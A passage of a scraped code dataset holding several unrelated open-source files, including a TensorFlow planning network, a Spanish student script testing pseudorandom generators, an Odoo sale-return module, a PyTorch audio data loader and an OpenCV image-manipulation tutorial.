env_instance_wrapper)\n else:\n self.se_list_postprocess = self.get_state_encoder(self.se_params[\"num_postprocess\"], env_instance_wrapper)\n \n \n self.final_node_embedder = tf.keras.layers.Dense(units=self.se_params[\"out_dim\"], activation=self.se_params[\"activation\"])\n\n self.ge_type = self.ge_params[\"type\"]\n \n self.num_action_dim = self.se_params[\"out_dim\"]\n self.action_decoders = self.get_action_decoder()\n self.value_decoders = self.get_action_decoder()\n\n\n def get_node_feature_dim(self, env_instance_wrapper):\n state, _ = env_instance_wrapper.envs[0].reset()\n adjacency_matrix, node_features, graph_features, action_details = self.get_parsed_state([state], 0, env_instance_wrapper)\n return node_features.shape[-1]\n\n def get_ckpt_parts(self):\n ckpt_parts = {}\n ckpt_parts[\"se_list\"] = self.se_list_postprocess\n ckpt_parts[\"final_node_embedder\"] = self.final_node_embedder\n ckpt_parts[\"next_state_projection\"] = self.next_state_projection\n ckpt_parts[\"reward_projection\"] = self.reward_projection\n ckpt_parts[\"action_decoders\"] = self.action_decoders\n return ckpt_parts\n\n def init_network(self, env_wrapper, instance):\n initial_state, _ = env_wrapper.envs[instance].reset() # Initial state\n self.policy_prediction(states=[initial_state], instance=instance, env_wrapper=env_wrapper)\n\n def get_state_encoder(self, num_se, env_instance_wrapper):\n se_list = []\n if self.use_edge_types:\n args = dict((k, self.se_params[k]) for k in gat_params)\n args['filter_size'] = num_se\n print(f\"Building a GAT with depth {num_se}\")\n se_list.append(GATConvLayer(**args))\n else:\n for _ in range(num_se):\n se_list.append(GATConvLayer(**dict((k, self.se_params[k]) for k in symnet_params)))\n return se_list\n\n def get_action_decoder(self):\n action_decoders = []\n for _ in range(self.ad_params[\"num_action_templates\"]):\n action_decoders.append(ActionDecoder(self.ad_params))\n return action_decoders\n\n def get_parsed_state(self, states, instance, env_wrapper):\n adjacency_matrix, node_features, graph_features = env_wrapper.get_parsed_state(states, instance)\n action_details = env_wrapper.get_action_details(instance)\n\n if self.use_bidir_edges:\n adjacency_matrix = adjacency_matrix + tf.transpose(adjacency_matrix, perm=[0, 1, 3, 2])\n adjacency_matrix = tf.clip_by_value(adjacency_matrix, 0, 1)\n\n return adjacency_matrix, node_features, graph_features, action_details\n\n\n def policy_prediction_helper(self, batch_size, adjacency_matrix_full, env_wrapper, instance, graph_features, action_details, se_embed_l, sample, training, prune_actions):\n node_embed = tf.concat(se_embed_l, axis=-1)\n final_node_embedding = self.final_node_embedder(node_embed)\n global_embed = tf.reshape(tf.concat([tf.reduce_max(final_node_embedding, axis=1), graph_features], axis=1), [batch_size, -1])\n if self.ge_type == \"deep_global_pool\":\n A = tf.reduce_max(adjacency_matrix_full, 0)\n global_embed_pool = self.global_embedder_net(final_node_embedding, A)\n global_embed = tf.concat([global_embed, global_embed_pool], axis=-1)\n\n action_scores = [0 for i in range(len(action_details))] # Score of each action\n action_affects = env_wrapper.envs[instance].instance_parser.action_affects\n remove_dbn = env_wrapper.envs[instance].instance_parser.remove_dbn\n for i in range(len(action_details)):\n action_template = action_details[i][0]\n input_nodes = list(action_details[i][1])\n arg_nodes = action_details[i][2]\n global_embed_temp = global_embed\n \n if len(arg_nodes) == 0: # Unparametrized action\n action_scores[i] = self.action_decoders[action_template]([global_embed_temp, None, training])\n else:\n if len(input_nodes) > 0:\n temp_embedding_list = [ # Select embeddings of nodes used\n tf.reshape(final_node_embedding[:, inp, :], [batch_size, self.num_action_dim]) for inp in input_nodes]\n node_state_embedding_concat = tf.concat(temp_embedding_list, axis=1) # Concat embeddings of all affected nodes\n node_state_embedding_reshape = tf.reshape(node_state_embedding_concat, [batch_size, len(input_nodes), self.num_action_dim])\n node_state_embedding_pooled = tf.reshape(tf.reduce_max(node_state_embedding_reshape, axis=1), [batch_size, self.num_action_dim]) # Max Pool\n arg_embedding_list = [tf.reshape(final_node_embedding[:, inp, :], [batch_size, self.num_action_dim]) for inp in arg_nodes]\n node_state_embedding_pooled = tf.concat(arg_embedding_list + [node_state_embedding_pooled], axis=1)\n action_scores[i] = self.action_decoders[action_template]([node_state_embedding_pooled, global_embed_temp, training])\n else:\n if remove_dbn:\n arg_embedding_list = [tf.reshape(final_node_embedding[:, inp, :], [batch_size, self.num_action_dim]) for inp in arg_nodes]\n action_scores[i] = self.action_decoders[action_template]([tf.concat(arg_embedding_list, axis=1), global_embed_temp, training])\n else:\n gnd_action_affects = action_affects[action_template]\n # Wildfire case; Treat as NOOP\n if gnd_action_affects:\n # IF wildfire\n action_template = action_details[0][0]\n action_scores[i] = self.action_decoders[action_template]([global_embed_temp, None, training])\n else:\n arg_embedding_list = [tf.reshape(final_node_embedding[:, inp, :], [batch_size, self.num_action_dim]) for inp in arg_nodes]\n action_scores[i] = self.action_decoders[action_template]([tf.concat(arg_embedding_list + [tf.zeros([batch_size, self.num_action_dim], tf.float64)], axis= 1), global_embed_temp, training])\n action_scores = tf.concat(action_scores, axis=-1)\n\n if sample:\n logits = tf.nn.log_softmax(action_scores)\n if prune_actions:\n # Get the actions you want to keep\n masks = env_wrapper.get_prune_mask(states, instance)\n masks = logits.dtype.min * (1.0 - masks)\n logits += masks\n return tf.random.categorical(logits=logits, num_samples=batch_size, dtype=tf.int32) # Return sampled actions\n else:\n if prune_actions:\n # Get the actions you want to keep\n masks = env_wrapper.get_prune_mask(states, instance)\n masks = -10e9 * (1.0 - masks)\n action_scores += masks\n probs = tf.nn.softmax(action_scores) # Expected shape is (batch_size,num_actions)\n return probs\n\n def policy_prediction(self, states, instance, env_wrapper, sample=False, action=None, plot_graph=False, file_name=None, action_taken=None, training=True, prune_actions=False, return_attn_coef=False, return_node_emb=False):\n adjacency_matrix, node_features, graph_features, action_details = self.get_parsed_state(states, instance, env_wrapper)\n adjacency_matrix = np.transpose(adjacency_matrix, [0, 1, 3, 2])\n batch_size = node_features.shape[0]\n num_nodes = node_features.shape[1]\n if self.preprocess_gat:\n se_embed_l = []\n if self.use_edge_types:\n for i, se in enumerate(self.se_list_preprocess):\n # res = se(node_features, adjacency_matrix[i], use_self_loops_in_all_adj, remove_attn) INITIAL ERROR\n res = se(node_features, adjacency_matrix, use_self_loops_in_all_adj, remove_attn)\n se_embed_l.append(res)\n node_features = tf.concat(se_embed_l, axis=-1)\n else:\n for i, se in enumerate(self.se_list_preprocess):\n res = se(node_features, adjacency_matrix[i], use_self_loops_in_all_adj, remove_attn) # INITIAL ERROR\n # res = se(node_features, adjacency_matrix, use_self_loops_in_all_adj, remove_attn)\n se_embed_l.append(res)\n node_features = tf.concat(se_embed_l, axis=-1)\n \n # print(len(se_embed_l), \"Preprocess:\", node_features.shape)\n \n if self.use_distance_mat:\n d = np.max(adjacency_matrix.astype(\"int32\"), 0)\n d = env_wrapper.get_distance_mat(d, instance)\n mask = env_wrapper.get_distance_mask(instance)[None,:] # A 2D mask \n mask = tf.repeat(mask, d.shape[0], axis=0)\n d = np.transpose(d, [1, 0, 2, 3])\n adjacency_matrix_fc = np.ones_like(d)\n distance_features, dist_attn_coef = self.gat_distance_mat(node_features, adjacency_matrix_fc, d, mask, use_self_loops_in_all_adj, remove_attn, beta=1.0)\n node_features = tf.concat([node_features, distance_features], axis=-1)\n \n se_embed_l = []\n if self.use_edge_types:\n res = self.se_list_postprocess[0](node_features, adjacency_matrix, use_self_loops_in_all_adj, remove_attn)\n se_embed_l.append(res)\n else:\n for i, se in enumerate(self.se_list_postprocess):\n res = se(node_features, adjacency_matrix[i], use_self_loops_in_all_adj, remove_attn)\n se_embed_l.append(res)\n if return_attn_coef:\n return self.policy_prediction_helper(batch_size, adjacency_matrix, env_wrapper, instance, graph_features, action_details, se_embed_l, training=training, sample=sample, prune_actions=prune_actions), dist_attn_coef\n elif return_node_emb:\n return self.policy_prediction_helper(batch_size, adjacency_matrix, env_wrapper, instance, graph_features, action_details, se_embed_l, training=training, sample=sample, prune_actions=prune_actions), se_embed_l\n else:\n return self.policy_prediction_helper(batch_size, adjacency_matrix, env_wrapper, instance, graph_features, action_details, se_embed_l, training=training, sample=sample, prune_actions=prune_actions)\n","repo_name":"dair-iitd/symnet3","sub_path":"multi_train/deep_plan/networks/symnet3/symnet3.py","file_name":"symnet3.py","file_ext":"py","file_size_in_byte":13049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"35475003069","text":"#Se pide programar al menos dos generadores de números pseudoaleatorios en particular el generador GCL del cual\n#se debe testear con al menos cuatro pruebas para determinar la calidad de generación. También se pide comparar los\n#generadores programados con otros, incluyendo el que posee el lenguaje Python\n\n#https://tereom.github.io/est-computacional-2018/numeros-pseudoaleatorios.html\nimport math\nimport numpy as np\nimport random as rand\n\nfrom scipy.stats import chi2\n\n\nsemilla = 10\n\n\ndef GenMedio(intervalo):\n x = semilla\n if len(str(x)) > 4:\n x = x[:4]\n while len(str(x)) < 4:\n x = int(str(x)+\"1\")\n while True:\n square = x * x\n if len(str(square)) < 8:\n need = 8 - len(str(square))\n addZero = \"\"\n for j in range(0,need):\n addZero = str(0) + addZero\n square = addZero + str(square)\n else:\n square = str(square)\n x = int(square[2] + square[3] + square[4] + square[5])\n yield x\n\n\ndef GenGCL( intervalo):\n a, b = intervalo[0], intervalo[1]\n # parameters as in GNU C Library\n a = 54321\n c = 44498 #Incremento\n m = 2**32 #Modulo\n xi = semilla\n while True:\n xf = (a * xi + c) % m\n xi = xf\n yield int((b - a) * (xf / (m - 1)) + a)\n\n\ndef DatosGCL(n, intervalo):\n lista = []\n gen = GenGCL(intervalo)\n for i in range(n):\n sig = next(gen)\n lista.append(int(sig))\n return lista\n\n\ndef DatosMedio(n, intervalo):\n lista = []\n gen = GenMedio(intervalo)\n for i in range(n):\n sig = next(gen)\n lista.append(int(sig))\n return lista\n\ndef DatosRandint(n, rango):\n u=[]\n for i in range(15000):\n u.append(rand.random())\n return u\n\n\ndef testChi(u,n):\n print(\"Test de Chi2\")\n a=[]\n b=1500\n c=0.1\n for i in range (n):\n x =0\n for j in range (len(u)):\n if (c-0.1)<=float(u[j])<=c:\n x+=1\n a.append(x)\n c+=0.1\n x2=0\n for i in range(len(a)):\n x2+=(((a[i]-b)**2)/b)\n print(\"X2 = \"+ str(x2))\n\n\ndef testCorridas(u):\n print(\"Test Corridas:\")\n lista = []\n cont = 1\n for i in range(len(u)-1):\n if u[i+1] >= u[i]:\n lista.append(\"+\")\n else:\n lista.append(\"-\")\n\n for i in range(1, len(lista)):\n if (lista[i] != lista[i-1]):\n cont += 1\n n = len(lista)\n media = (2*n-1)/3\n desv = math.sqrt((16*n-29)/90)\n z = (cont-media)/desv\n print(\"Z= \"+ str(z))\n\n\ndef main():\n rango = [1, 100]\n a=DatosGCL(50,rango)\n b=DatosRandint(50,rango)\n c=DatosMedio(50,rango)\n print(a)\n print(b)\n print(c)\n testCorridas(a)\n testCorridas(b)\n testCorridas(c)\n testChi(a,50)\n testChi(b,50)\n testChi(c,50)\n\n\n\nmain()\n","repo_name":"DamianBarzola/Simulacion","sub_path":"TP2.1.py","file_name":"TP2.1.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10686050472","text":"\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n my_sale_return_show = fields.Boolean(compute=\"_check_sale_return_show\")\n \n my_picking_ids = fields.Many2many('stock.picking', 'return_picking_rel',\n 'sale_id', 'stock_pick_id',\n string='Returns',\n copy=False, store=True)\n incoming_count = fields.Integer(string=\"Incoming shipments\",\n compute=\"_compute_picks\")\n \n my_return_ids = fields.One2many('sale.order.return', 'my_sale_order_id',\n string=\"Returns\", readonly=True)\n procurement_group_id = fields.Many2one('procurement.group', 'Procurement Group', copy=True)\n # my_return_ids = fields.One2many('create.return.sale', 'knk_sale_order_id',\n # string=\"Returns\", readonly=True)\n\n @api.depends('my_picking_ids')\n def _compute_picks(self):\n for rec in self:\n rec.incoming_count = 0\n if rec.my_picking_ids:\n rec.incoming_count = len(rec.my_picking_ids)\n\n def action_view_in_picking(self):\n action = self.env[\"ir.actions.actions\"]._for_xml_id(\"stock.action_picking_tree_all\")\n pickings = self.mapped('my_picking_ids')\n if len(pickings) > 1:\n action['domain'] = [('id', 'in', pickings.ids)]\n elif pickings:\n form_view = [(self.env.ref('stock.view_picking_form').id, 'form')]\n if 'views' in action:\n action['views'] = form_view + [\n (state, view) for state, view in action['views'] if view != 'form']\n else:\n action['views'] = form_view\n action['res_id'] = pickings.id\n return action\n\n @api.depends('picking_ids')\n def _check_sale_return_show(self):\n for rec in self:\n rec.my_sale_return_show = False\n picks = rec.picking_ids.filtered(lambda x: x.picking_type_code == 'outgoing' and x.state == 'done')\n if picks:\n rec.my_sale_return_show = True\n\n def open_sale_return(self):\n ctx = self.env.context.copy()\n ctx.update({\n 'default_my_sale_order_id': self.id,\n })\n return{\n 'name': 'Returns',\n 'type': 'ir.actions.act_window',\n 'res_model': 'create.return.sale',\n 'view_mode': 'form',\n 'target': 'new',\n 'context': ctx\n }\n\n\n\n\n\n\n\nclass SaleOrderLineInherit(models.Model):\n _inherit = \"sale.order.line\"\n\n \n my_return_qty = fields.Float(string=\"Returned\",\n compute=\"_return_qty_count\")\n my_balanced_qty = fields.Float(string=\"Balanced\", compute=\"_return_qty_count\")\n\n @api.depends('order_id.my_picking_ids')\n def _return_qty_count(self):\n for rec in self:\n picks = self.env['stock.picking'].search(\n [('id', 'in', rec.order_id.my_picking_ids.ids),\n ('state', '=', 'done')])\n qty = 0\n for pick in picks:\n line = pick.move_ids_without_package.filtered(\n lambda x: x.product_id == rec.product_id)\n qty += line.quantity_done\n rec.my_return_qty = qty\n rec.my_balanced_qty = rec.qty_delivered - rec.my_return_qty\n\n\n\n \n\n\n\n\n\n","repo_name":"mamadoteba2020/hatim_oman","sub_path":"sum_modules_of_odoo_15/return_sale_order/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19116959736","text":"def param_options(ranges: list, filters: list = None) -> str:\n # create filter param string\n terms = \"\"\n if filters is not None:\n for term in filters:\n for key, value in term.items():\n if isinstance(value, list):\n s = tuple([j for j in value])\n terms += f\"{key} IN {s} AND \"\n else:\n terms += f\"{key} IN ('{value}') AND \"\n \n terms += f\" EntryDate BETWEEN '{ranges[0]}' AND '{ranges[1]}'\"\n\n return terms","repo_name":"timothyyv/python-kafka-poc","sub_path":"src/utils/filter_params.py","file_name":"filter_params.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"2028519501","text":"from jsonschema import validate, ValidationError\nfrom time import sleep, time\nfrom nose.tools import *\nfrom tests import *\nimport bx\n\n\ndef test_none():\n \"\"\"Tests db.exp, with a key that doesn't expire.\"\"\"\n\n db = bx.Db()\n db.put('hello', 'world')\n assert db.exp('hello') is None\n\n\ndef test_expiring():\n \"\"\"Tests db.exp, with a key that does expire.\"\"\"\n\n db = bx.Db()\n db.put('hello', 'world', 2000)\n now = time()\n assert db.exp('hello') > now\n\n\ndef test_malformed():\n \"\"\"Tests db.exp, with a key that doesn't exist.\"\"\"\n\n db = bx.Db()\n assert_raises(KeyError, db.exp, 'hello')\n","repo_name":"iblislin/bx-python","sub_path":"tests/test_exp.py","file_name":"test_exp.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13437264029","text":"import torch.nn as nn\nfrom torch.utils.data import DataLoader\n\nfrom .cache import CachedDataset\nfrom .datasets import (\n FixedLengthDataset,\n TransformedDataset,\n VariableLengthDataset,\n)\nfrom .features import MelSpectrogramExtractor, Resampler, SpectrogramExtractor\n\n\nclass MappedDataLoader(DataLoader):\n def __init__(self, dataset, device=None, **kwargs):\n super().__init__(dataset, **kwargs)\n\n if device is not None:\n self.to(device)\n\n def to(self, device):\n self.device = device\n\n def __iter__(self):\n def _to(data):\n if isinstance(data, (tuple, list)):\n return tuple(_to(item) for item in data)\n return data.to(self.device)\n\n return map(_to, super().__iter__())\n\n\nclass DataTransformer(MappedDataLoader):\n def __init__(self, dataset, transforms, device=None, **kwargs):\n if not isinstance(transforms, (tuple, list)):\n self.transforms = [transforms]\n else:\n self.transforms = list(transforms)\n\n # Invoked later because of to()\n super().__init__(dataset, device, **kwargs)\n\n def to(self, device):\n self.device = device\n for transform in self.transforms:\n if isinstance(transform, nn.Module):\n transform.to(device)\n\n def transform(self, data):\n is_tuple = isinstance(data, tuple)\n for T in self.transforms:\n if is_tuple:\n output = T(*data)\n if not isinstance(output, tuple):\n output = (output,)\n data = output + data[len(output):]\n else:\n data = T(data)\n if isinstance(data, tuple):\n data = data[0]\n return data\n\n def __iter__(self):\n return map(self.transform, super().__iter__())\n\n\nclass IterationBasedLoader:\n def __init__(self, loader, n_iterations):\n self.loader = loader\n self.n_iterations = n_iterations\n self._iter = loader.__iter__()\n\n def to(self, device):\n self.loader.to(device)\n\n def __iter__(self):\n for i in range(self.n_iterations):\n try:\n batch = next(self._iter)\n except StopIteration:\n self._iter = self.loader.__iter__()\n batch = next(self._iter)\n\n yield batch\n\n def __len__(self):\n return self.n_iterations\n\n\nclass DataLoaderFactory:\n def __init__(self,\n sample_rate=None,\n block_length=None,\n hop_length=None,\n features=None,\n labeler='default',\n batch_size=1,\n n_workers=0,\n cache_features=False,\n ):\n self.sample_rate = sample_rate\n self.block_length = block_length\n self.hop_length = hop_length\n self.features = features\n self.labeler = labeler\n self.batch_size = batch_size\n self.n_workers = n_workers\n self.cache_features = cache_features\n\n self._waveform_transforms = []\n self._feature_transforms = []\n\n def training_data_loader(self, subset):\n return self._data_loader(subset, shuffle=True)\n\n def validation_data_loader(self, subset):\n return self._data_loader(subset)\n\n def test_data_loader(self, subset):\n return self._data_loader(subset)\n\n def feature_extractor(self, subset):\n fv_params = self.features.copy()\n method = fv_params.pop('method')\n if method == 'mel':\n new_sr = self.sample_rate or subset.dataset.sample_rate\n return MelSpectrogramExtractor(new_sr, **fv_params)\n if method == 'spectrogram':\n return SpectrogramExtractor(**fv_params)\n\n raise ValueError(f\"Unknown feature extraction method '{method}'\")\n\n def add_waveform_transform(self, transform, cacheable=False):\n self._waveform_transforms.append((transform, cacheable))\n\n def add_feature_transform(self, transform, cacheable=False):\n self._feature_transforms.append((transform, cacheable))\n\n add_tf_transform = add_feature_transform\n\n def waveform_transforms(self, subset=None):\n cacheable, non_cacheable = self._split(self._waveform_transforms)\n if subset is None:\n return cacheable, non_cacheable\n\n # Add transform for resampling if applicable\n orig_sr = subset.dataset.sample_rate\n new_sr = self.sample_rate or orig_sr\n if new_sr != orig_sr:\n cacheable.insert(0, Resampler(orig_sr, new_sr))\n\n return cacheable, non_cacheable\n\n def feature_transforms(self):\n return self._split(self._feature_transforms)\n\n tf_transforms = feature_transforms\n\n def transforms(self, subset):\n cacheable, non_cacheable = self.waveform_transforms(subset)\n if self.features is None:\n return cacheable, non_cacheable\n\n # Add extractor and subsequent transforms to the correct list(s)\n extractor = self.feature_extractor(subset)\n cacheable_, non_cacheable_ = self.feature_transforms()\n if len(non_cacheable) > 0:\n non_cacheable.append(extractor)\n non_cacheable += cacheable_ + non_cacheable_\n else:\n cacheable.append(extractor)\n cacheable += cacheable_\n non_cacheable += non_cacheable_\n\n return cacheable, non_cacheable\n\n def _data_loader(self, subset, **kwargs):\n # Determine which Dataset class to use\n if subset.dataset.clip_duration is None:\n cls = VariableLengthDataset\n else:\n cls = FixedLengthDataset\n\n # Determine the transforms to be applied (if any)\n cacheable, non_cacheable = self.transforms(subset)\n if self.cache_features:\n loader_transforms = []\n else:\n loader_transforms = cacheable + non_cacheable\n\n # Instantiate Dataset\n dataset = cls(subset, self.block_length, self.hop_length, self.labeler)\n if self.cache_features:\n if len(cacheable) > 0:\n dataset = CachedDataset(TransformedDataset(dataset, cacheable))\n if len(non_cacheable) > 0:\n dataset = TransformedDataset(dataset, non_cacheable)\n\n loader = DataTransformer(\n dataset,\n loader_transforms,\n batch_size=self.batch_size,\n num_workers=self.n_workers,\n pin_memory=True,\n **kwargs,\n )\n return loader\n\n def _split(self, transforms):\n # Determine the cut-off point\n offset = 0\n while offset < len(transforms) and transforms[offset][1]:\n offset += 1\n\n transforms = next(zip(*transforms), [])\n cacheable = transforms[:offset]\n non_cacheable = transforms[offset:]\n return cacheable, non_cacheable\n","repo_name":"tqbl/jaffalearn","sub_path":"jaffalearn/data/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40134174530","text":"import FWCore.ParameterSet.Config as cms\r\n\r\nfrom DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer\ntopDiLeptonDQM = DQMEDAnalyzer('TopDiLeptonDQM',\r\n\r\n moduleName = cms.untracked.string('Physics/Top/DiLepton'),\r\n fileOutput = cms.bool(False),\r\n outputFile = cms.untracked.string('DiLeptonEvents.txt'),\r\n ### \r\n TriggerResults = cms.InputTag('TriggerResults','','HLT'),\r\n hltPaths = cms.vstring('HLT_Mu3','HLT_Mu5','HLT_Mu9','HLT_Mu15','HLT_IsoMu3','HLT_IsoMu9','HLT_DoubleMu0','HLT_DoubleMu3',\r\n 'HLT_Ele10_LW_L1R','HLT_Ele15_LW_L1R','HLT_Ele20_LW_L1R'),\r\n ### \r\n hltPaths_sig = cms.vstring('HLT_Mu9', 'HLT_Mu9', 'HLT_IsoMu3', 'HLT_DoubleMu3', 'HLT_DoubleMu3', 'HLT_DoubleMu3'),\r\n hltPaths_trig = cms.vstring('HLT_Mu3', 'HLT_Mu5', 'HLT_Mu3', 'HLT_Mu3', 'HLT_IsoMu3', 'HLT_DoubleMu0'),\r\n ### \r\n vertexCollection = cms.InputTag('offlinePrimaryVertices'),\r\n vertex_X_cut = cms.double( 1.0 ),\r\n vertex_Y_cut = cms.double( 1.0 ),\r\n vertex_Z_cut = cms.double( 20.0 ),\r\n ### \r\n muonCollection = cms.InputTag('muons'),\r\n muon_pT_cut = cms.double( 1.0 ),\r\n muon_eta_cut = cms.double( 2.4 ),\r\n muon_iso_cut = cms.double( 0.2 ),\r\n ### \r\n elecCollection = cms.InputTag('gedGsfElectrons'),\r\n elec_pT_cut = cms.double( 5.0 ),\r\n elec_eta_cut = cms.double( 2.4 ),\r\n elec_iso_cut = cms.double( 0.2 ),\r\n elec_emf_cut = cms.double( 0.1 ),\r\n ### \r\n MassWindow_up = cms.double( 106. ),\r\n MassWindow_down = cms.double( 76. )\r\n\r\n)\r\n\r\ntopDiLeptonAnalyzer = cms.Sequence(topDiLeptonDQM)\r\n","repo_name":"cms-sw/cmssw","sub_path":"DQM/Physics/python/topDiLeptonDQM_cfi.py","file_name":"topDiLeptonDQM_cfi.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"15900951719","text":"\"\"\"\n假设有一个数组,它的第 i 个元素是一个给定的股票在第 i 天的价格。\n\n设计一个算法来找到最大的利润。你可以完成尽可能多的交易(多次买卖股票)。然而,你不能同时参与多个交易(你必须在再次购买前出售股票)。\n\"\"\"\n\"\"\"\n解题思路:\n如果第二天比第一天高,则卖出,卖出后又可以立刻买入\n\"\"\"\nclass Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n if len(prices) < 1:\n return 0\n res = 0\n for i in range(len(prices)):\n if prices[i] < prices[i+1]:\n res += prices[i+1] - prices[i]\n return res","repo_name":"alexkie007/offer","sub_path":"LeetCode/动态规划/122. 买卖股票的最佳时机2.py","file_name":"122. 买卖股票的最佳时机2.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19608126839","text":"\"\"\"initial database migration\n\nRevision ID: 5f62b64a1ded\nRevises: \nCreate Date: 2020-05-24 20:03:56.164393\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '5f62b64a1ded'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('customer',\n sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column('created_date', sa.DateTime(), nullable=False),\n sa.Column('contact', sa.String(length=50), nullable=True),\n sa.Column('name', sa.String(length=200), nullable=True),\n sa.Column('description', sa.Text(), nullable=True),\n sa.Column('status', sa.Enum('prospective', 'current', 'nonActive', name='status'), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('id')\n )\n op.create_table('note',\n sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column('customer_id', postgresql.UUID(as_uuid=True), nullable=True),\n sa.Column('value', sa.Text(), nullable=True),\n sa.ForeignKeyConstraint(['customer_id'], ['customer.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('note')\n op.drop_table('customer')\n # ### end Alembic commands ###\n","repo_name":"jbalintac/bd-fsd-customerinfo","sub_path":"api/migrations/versions/5f62b64a1ded_initial_database_migration.py","file_name":"5f62b64a1ded_initial_database_migration.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"870972069","text":"def longest_consec(strarr, k):\n if len(strarr) == 0 or k < 0 or k > len(strarr):\n return \"\"\n final_string = list()\n temp_string = list()\n for i in range(k, len(strarr)+1):\n del temp_string[:]\n for y in range(i - k, i):\n temp_string.append(strarr[y])\n if len(\"\".join(temp_string)) > len(\"\".join(final_string)):\n final_string = temp_string.copy()\n\n return \"\".join(final_string)\n\nprint(longest_consec([\"ejjjjmmtthh\", \"zxxuueeg\", \"aanlljrrrxx\", \"dqqqaaabbb\", \"oocccffuucccjjjkkkjyyyeehh\"], 1))\n","repo_name":"sLevasseur/Codewars_Training","sub_path":"Consecutive strings.py","file_name":"Consecutive strings.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3569112009","text":"import cv2 as cv2\nimport matplotlib.pyplot as plt\nfrom IPython.display import Image\n\ncb_img = cv2.imread(\"checkerboard_18x18.png\", 0)\n\nplt.imshow(cb_img, cmap='gray')\nprint(cb_img)\n\nprint(cb_img[0, 0])\n\nprint(cb_img[0, 6])\n\ncb_img_copy = cb_img.copy()\ncb_img_copy[2, 2] = 200\ncb_img_copy[2, 3] = 200\ncb_img_copy[3, 2] = 200\ncb_img_copy[3, 3] = 200\n\n# Same as above\n# cb_img_copy[2:3,2:3] = 200\n\nplt.imshow(cb_img_copy, cmap='gray')\nprint(cb_img_copy)\n\nimg_NZ_bgr = cv2.imread(\"New_Zealand_Boat.jpg\", cv2.IMREAD_COLOR)\nimg_NZ_rgb = img_NZ_bgr[:, :, ::-1]\n\nplt.imshow(img_NZ_rgb)\n\ncropped_region = img_NZ_rgb[200:400, 300:600]\nplt.imshow(cropped_region)\n\nresized_cropped_region_2x = cv2.resize(cropped_region, None, fx=2, fy=2)\nplt.imshow(resized_cropped_region_2x)\n\ndesired_width = 100\ndesired_height = 200\ndim = (desired_width, desired_height)\n\n# Resize background image to sae size as logo image\nresized_cropped_region = cv2.resize(cropped_region, dsize=dim, interpolation=cv2.INTER_AREA)\nplt.imshow(resized_cropped_region)\n\n# Method 2: Using 'dsize'\ndesired_width = 100\naspect_ratio = desired_width / cropped_region.shape[1]\ndesired_height = int(cropped_region.shape[0] * aspect_ratio)\ndim = (desired_width, desired_height)\n\n# Resize image\nresized_cropped_region = cv2.resize(cropped_region, dsize=dim, interpolation=cv2.INTER_AREA)\nplt.imshow(resized_cropped_region)\n\n# Swap channel order\nresized_cropped_region_2x = resized_cropped_region_2x[:, :, ::-1]\n\n# Save resized image to disk\ncv2.imwrite(\"resized_cropped_region_2x.png\", resized_cropped_region_2x)\n\n# Display the cropped and resized image\nImage(filename='resized_cropped_region_2x.png')\n# Swap channel order\ncropped_region = cropped_region[:, :, ::-1]\n\n# Save cropped 'region'\ncv2.imwrite(\"cropped_region.png\", cropped_region)\n\n# Display the cropped and resized image\nImage(filename='cropped_region.png')\n\nimg_NZ_rgb_flipped_horz = cv2.flip(img_NZ_rgb, 1)\nimg_NZ_rgb_flipped_vert = cv2.flip(img_NZ_rgb, 0)\nimg_NZ_rgb_flipped_both = cv2.flip(img_NZ_rgb, -1)\n\n# Show the images\nplt.figure(figsize=[18, 5])\nplt.subplot(141);\nplt.imshow(img_NZ_rgb_flipped_horz);\nplt.title(\"Horizontal Flip\");\nplt.subplot(142);\nplt.imshow(img_NZ_rgb_flipped_vert);\nplt.title(\"Vertical Flip\");\nplt.subplot(143);\nplt.imshow(img_NZ_rgb_flipped_both);\nplt.title(\"Both Flipped\");\nplt.subplot(144);\nplt.imshow(img_NZ_rgb);\nplt.title(\"Original\");\n\nplt.show()\n","repo_name":"Rvistix/OpenCV_Python_tutorial","sub_path":"02_Basic_Image_Manipulation/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16916698446","text":"import 